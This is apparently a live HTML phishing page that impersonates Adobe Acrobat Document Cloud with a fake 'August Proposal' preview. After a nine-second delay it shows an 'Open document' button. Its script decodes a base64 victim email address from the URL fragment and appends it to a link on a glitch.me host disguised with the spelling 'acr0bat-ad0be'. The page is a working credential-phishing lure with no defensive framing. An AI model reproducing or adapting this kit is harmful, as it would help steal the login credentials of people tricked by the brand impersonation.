<html>

<head>
  
  <title>Adobe Acrobat - Document Cloud</title>
      <link rel="icon" data-savepage-href="https://oshi.at/vjBc/PkTD.ico" href="https://oshi.at/vjBc/PkTD.ico" type="image/x-icon">
      <link rel="mask-icon" href="https://oshi.at/vjBc/PkTD.ico" color="">
  
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <script>
    
    setTimeout(() => {
  const box = document.getElementById('box');

  // 👇️ removes element from DOM
  box.style.display = 'block';

  // 👇️ hides element (still takes up space on page)
  // box.style.visibility = 'hidden';
}, 9000); // 👈️ time in milliseconds
    
  </script>
  
  <style>
.myButton {
	background-color:#3571DE;
	border-radius:28px;
	border:1px solid #0B6E99;
	display:inline-block;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:17px;
	padding:10px 20px;
	text-decoration:none;
	text-shadow:0px 1px 0px #2f6627;
}
.myButton:hover {
	background-color:#3571D;
  text-decoration:none;
  color:#ffffff;
}
.myButton:active {
	position:relative;
	top:1px;
  color:#ffffff;
}
  
  .center {
  display: block;
  margin-left: auto;
  margin-right: auto;
  width: 50%;
}
  
  
  .centerbutton {
  display: block;
  margin-left: 40%;
  margin-right: auto;
  width: 9%;
}
    
    span.hidden
{
   display: none
}
    



</style>
  
  
  
  <div class="text-center container">
    <div class="row">
      <div class=""><span><img width="auto" height="25%" alt="" src="https://i.ibb.co/fvdFwC6/August-Proposal-top.jpg" class="img-fluid"></span>
  </div>
      </div>
      <span class="hidden text-center" id="box"><a id="link" href="" class="myButton" >Open document</a></span>
  
  <div>
      <span><img width="auto" height="25%" alt="" src="https://i.ibb.co/DCW1cB9/August-Proposal-bottm.jpg" class="img-fluid"></span>
  </div>
        
  </div>
  
  <script>
    var currentUrl = window.location.href;
    
    var siteUrl = currentUrl;

var email = siteUrl.substring(siteUrl.lastIndexOf("#") +1);
    var linktag = "#";
    var link = "https://shadowed-shine-scribe.glitch.me/acr0bat-ad0be-3A463ec6f4-1895-47d5-ae59-3f74ca8ee6bc&viewer/proposal/augustproposal.htm";
   // Define the string


// Decode the String
var decodedStringAtoB = atob(email);


    var domainlink = linktag.concat(decodedStringAtoB);
    var mainlink = link.concat(domainlink);
    
    document.getElementById('link').href = mainlink;
    console.log(mainlink);
    console.log(decodedStringAtoB);    
  
  </script>
  </head>
  <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.12.9/dist/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
</html>
